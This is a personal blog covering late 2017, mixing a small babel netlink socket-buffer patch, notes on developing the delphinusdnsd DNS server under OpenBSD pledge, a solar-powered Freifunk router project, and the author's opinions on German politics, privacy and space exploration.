I wrote a patch for babel that the size of the receive buffer is dynamic to the
highest attainable value (within 2^x)..
--- kernel_netlink.c.orig 2017-09-03 10:45:54.000000000 +0200
+++ kernel_netlink.c 2017-09-03 11:02:55.000000000 +0200
@@ -232,11 +232,25 @@
netlink_socket(struct netlink *nl, uint32_t groups)
{
int rc;
- int rcvsize = 512 * 1024;
+ int rcvsize = 512;
+ int i;
nl->sock = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
+
if(nl->sock < 0)
- return -1;
+ return -1;
+
+ /* get the highest attainable RCVBUF up to 1 << 30 */
+ for (i = rcvsize; i < (1 << 30); i <<= 1) {
+ rc = setsockopt(nl->sock, SOL_SOCKET, SO_RCVBUF,
+ &i, sizeof(i));
+
+ if (rc < 0)
+ break;
+
+ rcvsize = i;
+ }
+ fprintf(stderr, "rcvsize set to %d\n", rcvsize);
memset(&nl->sockaddr, 0, sizeof(nl->sockaddr));
nl->sockaddr.nl_family = AF_NETLINK;
Hopefully its correct, I didn't test it.
ARD #5kampf politics round
September 4th, 2017
I watched the ARD #5kampf TV interview and noticed that the parties were lined
up from left to right in terms of extremes with the respective side. So
Die Linke was far left, AfD far right and CSU in the middle. I felt the CSU
was sorta in the wrong spot since Angela Merkel talked for them yesterday in
the ARD TV Duell. So in the end I felt of all the parties the left focused
parties were placed well in their responses to questions and in their questions
to others.
I'd have a question for Herr Hermann of the CSU though. He made it
sound like there is no more coal powerplants left in Bavaria and that we're
well placed as a solar power producing region. So my question is this. Bud,
why is it that my night electricity is at 14 cents/KWh and my day electricity
is at 23 cents/KWh or thereabouts. With Bavaria producing so much solar
doesn't it make more sense to make the day cheaper than the night. Because I
use up to 11,000 KWh's per year which is three to four times the national
average. The lions share of this electricity (along 9000 KWh's) is used up
by my winter heating units that run at night at the 14 cents/KWh in order to
conserve on my electricity bill. The times have changed. Daytime electricity
is cheaper! My heating units should charge during the day when solar can be
utilized. This is a very complex question, but the solution is very simple.
It would just mean reprogramming the heating units timer and flip the day and
night rates for electricity.
Overall I found the #5kampf interview OK, nothign exravagant was said that I
didn't already know. And I'll continue to put my pledge to Die Linke.
When will we get a manned space program for Germany/Europe?
September 5th, 2017
The Russians have a new Soyus, the model 5.
Why is the european continent not interested in manned space flight? We need
it in order to secure high tech jobs and be able to compete globally.
If I were chancellor we'd have a german manned space program in the next 10
years. But dials to the controls in the rockets would likely be in English,
not German. This is because English is a language that all german kids learn
from grade five and higher. It represents a certain maturity. Also I gave it
a little thought the only destinations that the rockets would steer to is the
moon, and any lagrange orbits to or from there. This means we could launch
rockets due north from a north sea platform or even the northern coastal
mainland in a polar orbit, This gives one opportunity to reach the moon every
14 days because as a rocket orbits earth in a polar orbit, it will after one or
two orbits gun the engines to reach the moon insertion orbit.
A repurposed Ariane 5 or 6 would do to start in order to keep costs low in
designing the manned rocket.
The EU Panopticon
September 7th, 2017
Here it is revealed that the EU is definitely working towards a
militarisation of surveillance on its citizens through research and contracts.
This is not new to me. I recently had to filter a particular university in
Germany which is paid by federal Germany (the government) for its research.
I have strong suspicions that this university is spying on me, and when I
confronted them per
email they did not reply. So it's not just the BND, MAD, NSA, Echelon, Five
Eyes and cohorts that one has to be careful of. It's universities doing
public spying as well. This university was gaining statistical data on me via
DNS, which is akin to spying regularily. If they wanted to look somethign up
it's a query once in a blue moon, but they regularily came back to gather the
same information over and over. I noticed them by their sort of queries, they
were very interested whether I had a SIP phone service running or wether I had
a Jabber service available. This was queried with the SRV DNS Resoure Record.
I won't stand for it. Take your spying elsewhere. While people are
sleepwalking into the next election, these things aren't even known and not
on the table. The closest thing we had was that the FDP a party in Germany
wants to consolidate all databases into a federal system for crime prevention.
One has to wonder, will my data from this university make it into this database
as well?
My hypothetical blueprint for an Information Age
September 9th, 2017
The problem
Recently I read an article that talks about schools not having wlan.
I was curious what people had to say and some voiced their frustrations:
German teachers being re-purposed for making a computer network
clued computer persons not being able to touch the network in fear that something gets broken.
students having viruses on their equipment.
I think we have to approach the early stages of the Information age with
structure, method and most of all a mandate to commit into an Information age.
I. Recognizing Dangers
Closed systems are unfortunately not trustable in my opinion. These include
systems from computer service corporations. Google comes to mind for example
even though it should be said that their primary purpose is they are an
advertising company. Their services to the human are at a second place after
the intend to brand the human first, for profit.
II. Open Source
In my opinion we should work with Open systems, systems that follow the student
from grade 1 through their graduation foremost.
That leaves us with Open Source. In university (higher learning) institutions
Open Source has already been at the forefront for many decades (2 decades).
III. Pillars
In terms of human resources it must be done right. People require job security,
and be part of something bigger than just a job. They become "Computer" teachers but should become a pillar for many decades. What these people should teach
is the basic and the advanced of computer sciences. They should not be a
marketing puppet for Microsoft and Google.
IV. Knowledge
Computing science isn't shallow knowledge. There is method, and to think
like a computer hacker is what's required for every person in the Information
age. Many people listen to the advertising giants such as Microsoft and don't
listen to the people who have a pure knowledge of what they talk about.
Conclusion
We have to teach "the way" and stay clear of dangers. Only with method can
every human learn how to deal with a computer. Will our political structures
pave the way for this? I am pessimistic, but perhaps we can work ourselves
out of the rut we're in now.
Schweinfurt public transport got more expensive
September 11th, 2017
I used to anonymously buy a 8 ride ticket with the bus driver and it cost
10 EUR. Per ride that was 1.25 EUR. Since August 1st they introduced an
eTicket which is not anonymous but allows you to have a flexicard plan
at 1.10 EUR a ride. At the end of month they will charge your bank account
for the rides you took. But it's not anonymous. An anonymous ride will cost
1.50 EUR one time fee. I think I'll keep doing that. This means I pay
0.25 EUR more per ride which adds up. I do about 6-7 rides per month
at current.
Got a solar panel for my west window
September 12th, 2017
The graphic above is credited to come from [http://www.renewable-energy-concepts.com/solarenergy/solar-basics/orientation-azimuth-angle.html]. Basically I
can expect 65% of peak (100 Watt panel) which will give me close to 5 Amps for
the 12V panel. I'm very excited by this and got to try it out. I'm hoping for
3 hours of sunlight in Winter (got to wait until the solstice) and thus 15 Ah
(ampere hours). This should give me enough power to power a 5 Watt Freifunk
Router which is on a battery hopefully 24/7. If it cannot sustain this I'll
have to place it on a timer. The time for solar experimentation has begun for
me. Although I once made a solar cooker which didn't work due to abberation
because I made it from a half circle and not a parabola (oops). But back then
it was a good try anyhow.
Turned up the heat for 2017/2018
September 14th, 2017
Three weeks earlier than last year, I've turned up the heat. We're currently
at 11C with the forecast for the next 7 days being not very convincing. I
have screenshotted it, here it is:
Six out of eight days are rain that's gotta cool everything down. I had five
months of no heat it would have been six had we a better forecast for the next
week. So the storage heat is set to two hours overnight charging, and the
units are set to level 1. Compare with
this article and this
article.
Politics: 9 days until Germany votes
September 15th, 2017
I have done a little more research regarding politics and I'm still keen
on voting for "Die Linke". Here is a list of all
parties in the Bundestagswahl. Last Bundestagswahl I voted for the
Pirate party, and I was bitterly disappointed that my vote increased the vote
of parties that don't represent my interests. This is because in German polls
a party must get 5% of the vote in order to be in parliament. If they're below
that, the parties that have over 5% evenly get this percentage of the party that
lost out. So it's akin to voting for CDU if you vote for the animalrights
party. I know it's not fair. But who said that in a democracy you can't have
tricksters?
I'm somewhat disillusioned that anything will change, but hoping that perhaps
we have a change in government, but it's unlikely.
Leaving Google services soon
September 15th, 2017
I've made up my mind. I'm going to close my google (G+, youtube) account.
I've also explored the possibility of using duckduckgo web search engine.
Let this be clear, "I don't like being tracked, stored, analysed, etc.".
I'll give everyone a few days before closing the account.
In other news, I logged into my twitter account today in order to close it
again. Last time it didn't go through the right way and wasn't closed.
I have nothing against american corporations. I just dislike being tracked
through half my life by google and co.
Supercluster.Virgostar.NET is no more
September 17th, 2017
My VPS supercluster at transip.eu that I cancelled 2 weeks ago is no more.
The provider has pulled the plug so to speak. And I have matched that by not
giving any more answers for supercluster via DNS:
2001:19f0:6c00:9041:5400:ff:fe11:3332" from \
2001:XXXX:XXXX:9265:5400:ff:fe1b:352a (ttl=0, region=255) for \
"supercluster.virgostar.net." type=A(1) class=1, edns0, dnssecok, \
answering "NXDOMAIN" (55/876)
This host was my mainstay for three years. What remains is omega.virgostar.net,
psi.virgostar.net and chi.goldflipper.de but I'm thinking of getting rid of
chi as well. With chi removed I'll make savings of 20 EUR per month, which is
not big but I can reuse this money for something.
Ordered a new Book
September 17th, 2017
New times have started and new directions. I'm going to learn visual c++ and
have ordered a book regarding this:
Visual C++ 2010: Das umfassende Handbuch für Programmierer (Programmer's Choice) - Louis, Dirk
I'm hoping to write GUI apps for PC's. We'll see how it goes.
Left google services
September 17th, 2017
The very last video I watched on my account was an Anonymous clip regarding
privacy of americans, they played an Edward Snowden clip. Then I deleted my
account, I should not exist on the Google network anymore. Goo(dbye) Goo(gle).
Updated truncation code on delphinusdnsd
September 18th, 2017
When a truncation happens delphinusdnsd will now give "empty answers" with
the TC bit set. This prevents mangled record counts and thus malformed
answers. It looks like this for example:
The commit to put this in was made in revision 1.57
here. Also the dnsviz which first unearthed this as a problem is now
in the non-red see the results here (dnsviz.net).
My Solar Panel and Me
September 19th, 2017
I took this with my iPod. The panel looks bigger than it is. I have put it
in place but haven't done the electrical hookup yet. Perhaps after the
equinox which will be in 3 days.
Revamped www.solarscale.de
September 20th, 2017
Just in time for Equinox I have redone the webpage for www.solarscale.de.
It acts as an amplifier/exploder to all my other websites. Enjoy the art! I
did that with my wacom tablet on gimp mostly.
Germany goes to the polls tomorrow
September 23rd, 2017
Tomorrow is election day. This will be my last political article regarding
this matter pre-election. I'm still keen on voting for Die Linke. As I
said to someone else in Canada they are the closest thing to the thing to
the canadian NDP. They are left-wing, for social justice and want higher
minimum wage. I don't expect them to win the entire election but I do want
them to represent a strong opposition in german parliament, anything better
than this is just a bonus. I'm not extreme or an extremist, but I'm a left
leaning individual and most of all I'm threatened with poverty. Really!
The Die Linke party recognizes this most of all and has the most complete
package of all parties regarding fighting poverty and unequalness. I'm for
raising the taxes for the rich, and lessening taxes for the poor, as well.
The scissors-image, as they say, between rich and poor should close not go
further apart. I'm for a strong middle class as that's all that's what's
left for me in realistic terms. Anyhow we go to the polls tomorrow and
we bring the values of Germany to the table and elect which party we want.
Let's not make a farce of this election by not showing up or voting
non-serious.
Not as disappointed as last election, but it's bad...
September 24th, 2017
As you can see my Party made it into parliament. Yay! Finally I'm part of something that made it. My party is the smallest party in german parliament. Also what's noticeable is that the AfD got 13.2 percent. Unfortunately these people
are mostly racists and right wing populists. As far as the SPD is concerned, they are moving into the oppositions which leaves a black-yellow-green coalition for government or a black minority government.. we'll see how that works out.
Open Letter to Tim Cook at Apple
September 27th, 2017
From: "Peter J. Philipp"
To: Tim Cook
Subject: How about a slimmed down version of Mac OS?
Hi,
You don't know me but I have a lot of apple products. I'm running El
Capitan still on my 2015 MacBook Pro because I don't like Sierra and I
don't like High Sierra. I don't want all this Artificial Intelligence SIRI on my computers (with open microphone and all). I don't like the
cloud functions. So I was wondering if you'll offer a privacy edition
to a newer Mac OS? A slimmed down version. It's what I'd gladly want,
I'll even pay for it if it's 29.95 or something.
Thanks for listening.
-peter
With these books I hope to program C++ on Windows
September 27th, 2017
As you know over the course of the last 7 years I've been aquiring a lot of
books. Here is a picture of the books that I hope to be using to learning
C++ and program Windows (under vmware on Mac OS X) with them.
This is for a project that is upcoming for me. Who knows perhaps I'll land
a job some day as a windows programmer. That's all that is around this
region anyhow in terms of jobs.
Autumn in full swing
September 28th, 2017
I played a bit with the brightness/contrast for this photo. But this is almost
like it is viewed with my own eyes.
'Tis lovely.
Two crows waiting for sunrise, watching
September 30th, 2017
Saw these two crows on the sirens this morning, it made a good photo.
Shortly after this picture the sky turned yellow not red due to the sun
rising. It was miraculous.
The space race to the moon
September 30th, 2017
Russia and the USA want to erect a space "gateway" in Lunar L2 behind the
moon. Here is why I think that is a bad idea. We don't have too many
"rocks" in earths vicinity that are shielded from electromagnetic spectrum
that the earth emanates. The far side of the moon is prime property for
radio telescopes which constitute a larger spectrum than visual. Once we're
able to put radio telescopes on the far side of the moon, there won't be a
need to have them on earth anymore. But we may want to erect huge arrays
in order to make use of the entire backside of the moon. The bigger the
better. With a space station orbiting above in L2, there will be radio
interference. However since it is easy to move a space station from L2
to L1 (or any Lagrange point that is) I'm not overly worried, just sayin'.
I have included a drawing from my textbook "Fundamental Astronomy" which nicely
shows the entire spectrum of electromagnetism.
Are you colonizing Mars? A comparison with Mercury..
September 30th, 2017
I took a look at Moon and Mercury today and noticed that both Moon and Mercury
are thought to have in excess of 600 km^3 of water-ice in craters of eternal
darkness. This is wonderful! Instead of going to Mars maybe we should go
to Mercury and live in the dark craters which we'll light with artificial
lighting (no heat).
Mercury
Mars
Suitable position
polar craters (cold)
equatorial (liquid water)
Gravity
0.38 (1 == EARTH)
0.38 (1 == EARTH)
Atmosphere
absent at poles
yes (carbon dioxide)
Water
suspect of having ice in craters
yes
Distance from Earth
0.6 AU
0.6 AU
Difficulty of reaching
costlier than mars
less costly than Mercury
I read a little about colonization of Mercury on wikipedia and it is said that
Mercurians could send solar sails into the outer solar system powered by mass
drivers from Mercury and the push of the suns current after that. What a nice
idea. Once an industrial process is established to make thin sail fabric it
could be flown to Venus to make a giant sunshade! Ie. cooling Venus as in
terraforming.
The gravity of Mercury is interesting to say the least. It is more than the
moon and not less than Mars's. If they think that Mars's gravity can sustain
a human without problems over the course of years then take a look at Mercury!
I think this is a really great candidate for colonization and I'd consider it
over Mars, any day.
I said something like that...
October 3rd, 2017
Today is germany unity day, so it fits that I talk about a report that a german
government institution (dlr.de) who recently
replaced
all their Cisco routers with Lancom equipment. Lancom is a german manufacturer
of network equipment. Roughly shortly after the Snowden revelations it became
obvious for me to be careful with american network gear. (That didn't however
prevent me from buying a used Ubiquity Networks router this year). I think what
DLR did was a good strategic move, as europe wants to go to the moon in the
next 10 years and surely is exploring secret technologies to do it.
Ported delphinusdnsd-current to Linux
October 4th, 2017
I have ported the new code to Linux. This is in anticipation of snapshot
downloads happening because of this message on delphinusdns.org:
On October 4th, 2017, a fix went in fixing CNAME's with DNSSEC.
Symptoms for recursive DNS servers with a CNAME pointing to an A
often returned with a SERVFAIL. Please download a snapshot after
12 midnight CEST on this date to remedy.
Instead of waiting for a 1.1.1 release (which will never happen, it's too late
in the year), just go with this snapshot tomorrow if you're using delphinusdnsd.
I did not port to FreeBSD or NetBSD yet, I hope there is not too much to do
and I'll check them in the coming days. It compiles and works on Linux and
OpenBSD (where it's developed on).
Switched on the Solar Router
October 7th, 2017
My dad and I finished the cabling and battery work yesterday and I switched
on the Freifunk router on the DC-DC adapter at 9PM yesterday. I figured out
the battery
can last 7 days or so without the panel charging it. We'll see how that goes.
Here is an image of the setup now.
You may recall an earlier article where the entire panel was shown from the
backside. Just in case you don't I'll provide it here.
The forecast around here is not that rosy so I'm hoping for sunlight between
2PM and evening at any chance to charge the battery. We'll see. So far this
project has cost around 550 EUR, but I got all the CE certified devices and
there was very little custom cabling being done. What I don't have is an
AC-DC battery charger, I hope I can do without with this 100 Watt panel. But
who knows what the future holds. I'm very happy how this all turned out.
Temporarily going back to AC
October 9th, 2017
The router that I put on DC/Solar is going to be turned off by me tomorrow and
put back on AC until possibly friday morning. When I bought the battery it
was said to be charged but it may not have been 100% charged. I now learned
that we won't have sunny weather in the forecast until friday so I'm doing this.
Since I don't have a battery charger this is the best way to conserve power.
Friday is supposed to be 10 hours sunshine, I'm really looking forward to it.
OpenBSD 6.2 released today
October 9th, 2017
Happy Canadian Thanksgiving! Just in time for turkey dinner
OpenBSD
released its version 6.2. Enjoy! And don't forget to donate!
Donation time again
October 9th, 2017
I have donated 35 EUR to OpenBSD. Cheers!
A 49 qubit Google Quantum Computer by end of year?
October 14th, 2017
I came across
this.
Google wants to achieve Quantum supremacy. I find this scary for an advertising
company to wield so much power. As you know, I'M somewhat anti-advertising and
don't have any banners on this blog or website. Although I still have some
friends that are involved in the advertising industry. Where will it all lead
us?
Krack Attack, WPA2 broken?
October 16th, 2017
The rumour of the day is that WPA2 is broken.
here is a writeup
by arsetechnica. At home I'm mostly OK I think as I wrap my layer 3 in IPSEC
as well, so if WPA2 is broken there is another layer to crack. Hopefully there
will be patches though.
Finished upgrades to 6.2
October 17th, 2017
I had finished my upgrades to OpenBSD 6.2 on saturday, but i wanted to do
a network wide backup as well. That was done last night. AFAICR my network
doesn't have any more 6.1 or 6.0 machines.
Purchased Fundraiser Tees
October 24th, 2017
I have purchased two
fundraiser t-shirts
designed by a friend of mine's daughter that will ultimately rebuild a Nunavut
school in Canada. Read the hyperlink to gain more information. Thanks goes
to Jackie who helped finding my mails in the stores Junk mail folder. The
t-shirts I have asked the store to send to my niece and nephew, also in Canada.
Delphinusdnsd: What's ahead in the next two months
October 27th, 2017
The year is coming to an end in 2 months, and I'm going to tell what there
is still to do until the 1.2.0 release. I'm working on patches to make
delphinusdnsd work more around the imsg functions found in OpenBSD. I'm
hoping for one more week of vacation between christmas and new years and then
I'm going to likely roll the 1.2.0 release. Right now we're a go for a
January 1, 2018 release. Time will tell if that is manageable. Beyond the
two months I don't want to speculate too much. But I'm interested in putting
CAA support in for the 1.3.0 release. Also I need to do key-rollover in
DNSSEC as my own zones need new keys (RSA 1024 bit strength currently).
Purchased last batch of books for year
October 28th, 2017
Last year I purchased 15 books in total. I matched that this year. Here is
the last batch of books that I bought for 2017.
Artificial Intelligence: A Modern Approach, Global Edition - Russell, Stuart,Norvig, Peter
Astrometry for Astrophysics: Methods, Models, and Applications - van Altena, William F.
Fundamentals of Astrometry - Kovalevsky, Jean
I decided to buy two books on astrometry because yesterday I was sifting through
ESA's Gaia mission page and downloaded data regarding the parallax of of stars
that this mission constructed. It's unrelated to the books but if you were
curious check
here. I plan to make a small program to help me determine the closest
stars in any region in the sky. Anyhow I noticed the data was cross referenced
to the Hipparcos mission which ran earlier and did parallax astrometry as well.
I found the 13th most distant star from earth in the constellation virgo was
called Ross 128 aka HIP 57548. In the
distances paper that I got the data from it is the closest star. Why I don't
know but it is, I sorted the data and checked. Perhaps because the other 12
closer stars are too close? Or are well known? Anyhow to get to the bottom
of some of my questions I bought these books. I'll have to have a lot of
reading to do. Perhaps I can couple astrometry with artificial intelligence
one day. LOL.
Network re-arranging
October 28th, 2017
Due to the KRACK attacks I have
decided to lay a cable from the hallway into the office. This will make the
access point irrelevant, but i'm keeping it around just in case. But! I'm
at a point where i need more ports in the office and my firewall uranus there
only has six ports, and all utilized. So I'm going to swap uranus with venus
eventually as venus has exactly six ports utilized with no more coming in the
foreseeable future. It also has six spare ports for a total of twelve ports
(it's a soekris that is maxed with expandability). I'll likely immediately
use up 8 ports on venus in the office, as I'm moving the access point into
the office as well (going to keep it off until it's needed, likely never since
I am going to explore using IPSEC on a roadwarrior config with freifunk).
Here is an updated network map how it should look like:
So I'm likely going to get this done in the next three weeks.
What it tells me
October 30th, 2017
I've been job-hunting for a while now. Conclusion: I'm not wanted. No matter
what I may know, if they don't like me. And they don't. They won't hire me.
It's so frustrating I want to climb a ceiling or something. Like a cat.
I'm really considering starting my own business as I don't see a chance to get
hired here by someone else.
20 Years since I started at Globalserve.NET
November 2nd, 2017
It was in November 1997 when I started working at this ISP. At first I started
part-time but that changed to full time as I dropped a math course I was taking
at the University of Toronto. Dan M. (RIP) had introduced me to Robin D. who
was CEO of Globalserve. It launched me on a career that was like a roller
coaster. I wish Globalserve hadn't sold but there was no money to be made with
analog modems anymore so they had no choice. I worked really hard at that
place, and for low wages for the type of job. At Globalserve there was a guy
named Dustin (or Justin?) who ran OpenBSD on his laptop, which I thought was
really cool. With help from Figz on IRC I installed OpenBSD on my workstation
there too. First time I ran OpenBSD (it was 1998), the computer then was
called geeklab.globalserve.net, which was odd but I wanted to be a geek back
then or something, hehe. Am I a geek? I don't know you tell me. Some people
I met at or through Globalserve/Primus are still in my friend-circle, and I
miss some other people that I lost contact with. 20 years gone.. damn.. almost
half my life, through thick and thin, I'm still here.
Internet bandwidths
November 3rd, 2017
In 1994 I first had Internet. Off a 28.8 kbit/s analog modem. In 1998 then
I upgraded the analog modem to a 64 Kbit/s ISDN-NA channel. In 1999 I got
1 Mbit/s ADSL and gone were the analog modems. Today I have 100/40 Mbit/s VDSL
, so between 1994 and 2018 that is an increase of a factor of 3555.56 over a
timespan of 24 years. So in 2042 if this trend keeps up we can enjoy bandwidths of 350 Gbit/s. I think this is only doable with fibre and currently with 1
laser only 100 Gbit/s is achievable, so there is room for improvement in the
FTTH technology. I'm locked in to a contract on VDSL until 2019, but in 2020
I'm planning on upgrading my home network to 10 Gbit/s speeds. Once that is
done, my router will be switching faster than the 300 Mbit it currently does
and I'm ready for gigabit to the home. Whether that is over copper or fibre
I don't really care, but by 2024 I sure hope to have over 1 Gbit/s speeds
available at which FTTH or FTTB (I'm in a building) should be here. That's
6 years turn-around time for the Telekom or other providers to deliver.
Time will tell. BTW I'm for the government to privatise the Deutsche Telekom
and use the money to re-invest in fibre to the home.
The TriNet
November 4th, 2017
Here someone wrote about the TriNet which is comprised of Facebook, Google and
Amazon (all american companies btw). See here.
BTW I have half a dozen websites on the Internet, but none of them do much in
terms of user interaction. Of those three companies I use Amazon, to get my
books, but I use Google less and less (use duckduckgo for searching now) and
don't use facebook at all (last use was 2011?). I think the Web is not
going to be surplanted by the TriNet like the author here says. But who knows?
If anyone has ideas how we bloggers can appeal more to people let me know.
Currently I get most traffic from the USA, this is probably directly linked
to the language I chose on this blog. Next is France, Germany, China and
Ukraine. I have room to grow really as I get 2 TB volume on my VPS that
hosts the web, but I'm not there yet. Currently the websites take up 1 GB of
traffic. So I have lots of resources that I pay for but that aren't utilized.
I wish I could say "people wake up", but wake up to what? Many people are
clueless to know that they can write a blog, or maintain it. Perhaps something
like Facebook is needed for them. Too bad Facebook is not a not-for-profit
though, and we already know my stance on the advertising. So yeah the
web is dying.
Mom is back in the hospital
November 4th, 2017
My mom is at the hospital to get X-Rayed. She fell last night going to the
washroom, my dad told me. I hope she hangs in there.
Reparations for Greece but not for Poland
November 6th, 2017
Why is it that I don't think Poland should get reparations? For one Poland
has taken german territory after world war two and that adds to their
prosperity. Anything beyond that is just greedy. Greece on the other hand
deserves reparations as I indicated on this blog before I think. Their
demands in the 1970's or 1960's were met with a lump sum but it was not nearly
enough.
My high risk investment
November 10th, 2017
I'm thinking of starting an Internet Cafe. I'm passionate about this. The
high risk here is that I won't recover the money invested (ROI) and another
risk is that I'll go out of business within 2 years. Basically these two
years will be pre-paid and if it doesn't make money then I'll end with what
I started seven years ago (around 5K EUR). I'm gonna let it run through my
head and also ask my dad's advice. I've summed up some numbers. 3500 EUR
for advertising in two years and 15K-20K EUR initial investment in things I
need, plus XXX EUR rent for the place. I'm also going to re-use some computers
that I already have, just need to upgrade them in some ways. Still thinking
and running the numbers...
Politics: Coal
November 12th, 2017
The exit from coal fired powerplants for 2030? Too late. We should strive for
a 2020 or 2022 exit date. That's my opinion.
The giant void google and co leave behind
November 13th, 2017
Google and co are not necessarily ethical. They weave advertising or self-
advertising in everything they do. Sure they got the big money, but is that
what's driving computing today? IBM and Google are said to have 49+ qubit
quantum computers with these they are likely able to further their artificial
intelligence to do stuff like face recognition, breaking strong crypto,
photo content recognition, strong game opponents, and who knows what else!
And all in little time. Aside from the glamourous quantum computer, what are
they doing to humans who are constantly faced with advertising? It can't be
good.
For me I've disabled all my google accounts except for my dayjob where I don't
have this control over it. I've decided not to use advertising to make a buck
off my website. I think my website is nicer that way. But given the threat
of google and co (namely facebook and microsoft) we're being left behind is my
fear. While everyone is using high technology _unliberated_ meaning they use
high technology in return for giving up every single private detail of their
own self, we are left behind when we try to protect little pieces of our
lives. I live in a region where noone has ever heard of the operating system
that I use. We're said to be decades behind and laughed about by the
ignorant population. But to me we're at the forefront of technology that isn't
advertising or closed-source driven. We are the warriors, we are the best, but
we're being beaten anyhow by google and co. I think ethically and morally
what's happening in my perspective is wrong. There oughta be a halal or kosher
Internet that adjusts all these wrongs to right. I don't know if we'll ever
beat the advertisement Internet and stomp it to nothingness but it sure would
be nice to see that.
whew, had to get that off my chest.
Ruthenium 106 over Europe
November 13th, 2017
Once again the medias are not reporting the truth. There is several reports
on non-mainstream media that ruthenium-106 has been detected in the atmosphere
over Europe. Possible causes are a nuclear accident in Russia or Kazakhstan!
Come clean!
Subscribed to Golem.de for 18EUR for 6 months
November 13th, 2017
I'm a long time reader of this IT news site. In order to not see advertising
it's worth it to pay 3 EUR a month. IMO.
Feeling under the weather today
November 16th, 2017
I'm ill, I think I cought a flu virus. I'm going to take it easy today.
Thankfully I have 1 more portion of food in my kitchen, to take me through
another day.
Coalition with FDP didn't work out? Die Linke?
November 21st, 2017
How about a Black-Green-Purple coalition? There is just enough
percentage
points to form a government with Die Linke. I'd love to see the long faces
that FDP will make when Angela Merkel refuses to call for new elections.
What the Right Wingers want to achieve
November 23rd, 2017
Nothing. They just want to destroy hard work, because they hope to gain
something. Can't be wrong when everyone gets reset right? I'm talking
about the FDP's betrayal of the CDU Union. Let's put it in another light.
Yep it's still betrayal. We have to draw lessons from this before we as
voters get misled by these right wing personalities. They are not for the
people, they are selfish backstabbing haters. I'm putting this warning
beacon up for centrists and leftists all over. Don't do business with the
right! You'll be backstabbed.
Delphinusdnsd Flowchart 2017
November 25th, 2017
I have created this flow diagram, on how I think delphinusdnsd should work
with pledge from OpenBSD. Notice the pledge parsing process... that doesn't
exist yet, the rest does. The pledge parser will take queries from UDP and
TCP engines and parse them and then send them back parsed. It's a little bit
of fickle-programming but I think I may get it in before next release.
The pledge parse will likely only see pledge("stdio sendfd recvfd", NULL); and
that's it. If there is a bug in my parsing it'll be stopped here.
Possibly applying to Prototypefund.DE next year
November 25th, 2017
As you know I've been writing on delphinusdnsd for close to 13 years now.
I've always done this on my spare time and not for pay. I use delphinusdnsd
on my own servers, I don't know how many others use it. So a while ago I
came across this website that is a public funding project of open source.
The requirements are that one lives in Germany and the project is open source
and available on the 'Net.
If I can work out a deal to perhaps put more DNSSEC ciphers in my daemon and
other things, perhaps I can make use of this fund. The
link to it is here. Next
application is in February 2018.
I tightened the pledge on delphinusdnsd a little
November 27th, 2017
Fortunately for me the changes in OpenBSD 6.2 allowed me to make pledge
explicit to use on OpenBSD. I was also able to tighten the pledge promises
a little increasing security (most likely). Thanks OpenBSD!
What I want in delphinusdnsd
November 27th, 2017
A presentation by Theo
de Raadt had this on page 22:
And that's exactly what I want in delphinusdnsd, it's a little bit of
programming but I think I can get it done before new years.. mainly because
I get one week holidays this winter.
My pledge is tighter!
November 29th, 2017
In comparing NSD with delphinusdnsd in OpenBSD this is what I came up with:
server.c: if (pledge("stdio rpath inet", NULL) ==
-1) {
And in Delphinusdnsd:
delphinusdnsd.c: if (pledge("stdio", NULL) < 0) {
Which one are you gonna trust on security issues? (If only delphinusdnsd was
only half as good as NSD *smile*). But it's more secure in the crap string
handler aka pledge parser.
How many levels of government do you have in the EU?
December 1st, 2017
We all saw what happened in catalonia and shake our heads... But! Have you
ever considered what it means to be in the EU? Let's count the levels here
in Schweinfurt (of government).
EU level
Federal Germany
Federal State of Bavaria
Regional government of Lower Franconia
City Hall
That's 5 levels. Our tax money pays 1-2 levels too many! I'm sure all those
people are a dream come true for bureaucracy, but it's not in the interest of
the citizen. So which are we gonna cut?
Cut the EU we basically have Brexit. Cut Federal Germany we basically have
Catalonia, Cut the Federal State of Bavaria (there's an idea!) and we're left
with Franconia as the regional government.
Seriously people think about these things! Because we don't need to have five
levels of government, with all their bureaucracy and waste. Think about this
before AI thinks for you and recommends cuts before you thought about it your
selves. It can't go on like this forever!
Yesterday was first snow day for 2017/2018
December 4th, 2017
Yesterday was a real snow day. Very small flakes but lots of them (over time).
Unfortunately the snow won't stick around, it's supposed to get warmer in
Germany.
In the EU, can journalists be safe?
December 5th, 2017
Something has been on my mind lately. The
murder of a
Maltese Journalist. As you know Malta is in the EU. She was killed by a car
bomb. I find this outrageous that this happens in the European Union.
This is something you hear of from Banana Republics, but it seems the "elite"
terror has reached within our borders as well.
Are the Ice Giants leaving Earth?
December 5th, 2017
Global warming is real. The ice is melting. While our leaders are negotiating
whether they should allow 2 degrees C or 4 degrees C global heat-up... it's
irrelevant. The Ice Giants may be off to other worlds. Perhaps when we need
to be around ice the place to go is Mars or further from the sun. It seems
we're facing the riddance of ice on earth. We've beaten the cold. But we
know how to get to it, if we want to. Just too bad a hot earth is more
uncomfortable than a cold earth, or is that a foolish statement? What will
become of the children and their children? I won't be around in the future
and I don't have offspring so I couldn't care less really. I just hope it stays
nice(r) while I'm doing my time on earth.
Donation time
December 8th, 2017
I have donated 50 EUR to OpenBSD. This brings my donations for this year to
OpenBSD to 170 EUR. I likely won't donate until next year again. Cheers
OpenBSD! Seasons Greetings!
Year in Review (This was 2017)
December 8th, 2017
December 18th, 2016 - Solstice in three days
December 24th, 2016 - Merry Christmas
December 24th, 2016 - Christmas Tree 2016
December 27th, 2016 - Hacking days
December 31st, 2016 - Happy New Year 2017
January 2nd, 2017 - Delphinusdnsd will be released January 29th
January 3rd, 2017 - Goodbye Mac OS X port
January 5th, 2017 - BIND didn't reply with AD flag
January 8th, 2017 - RFC 8020 violation of Delphinusdnsd
January 8th, 2017 - Obama, why not pardon Chelsea Manning?
January 10th, 2017 - After fixing NODATA of ENT names...DNSSEC breakage
January 16th, 2017 - Short Weekend
January 18th, 2017 - Blog outtage
January 18th, 2017 - Thank you President Obama! Chelsea will be released May 17th
January 19th, 2017 - After 8 years presidency Obama becomes ex-president
January 19th, 2017 - Electricity for 2016
January 19th, 2017 - Fan of flying machines
January 23rd, 2017 - Delphinusdnsd will be released in roughly 4 days
January 25th, 2017 - First mesh in Schweinfurt/Deutschhof
January 28th, 2017 - Delphinusdnsd 1.1.0 released
February 9th, 2017 - Switching Internet Providers
February 9th, 2017 - Updated Network Map
February 10th, 2017 - Munich show a little more respect to Linux
February 14th, 2017 - I switched Internet Providers
February 17th, 2017 - Why I won't be renewing my Parship.de membership
February 21st, 2017 - Jobless despite Certification
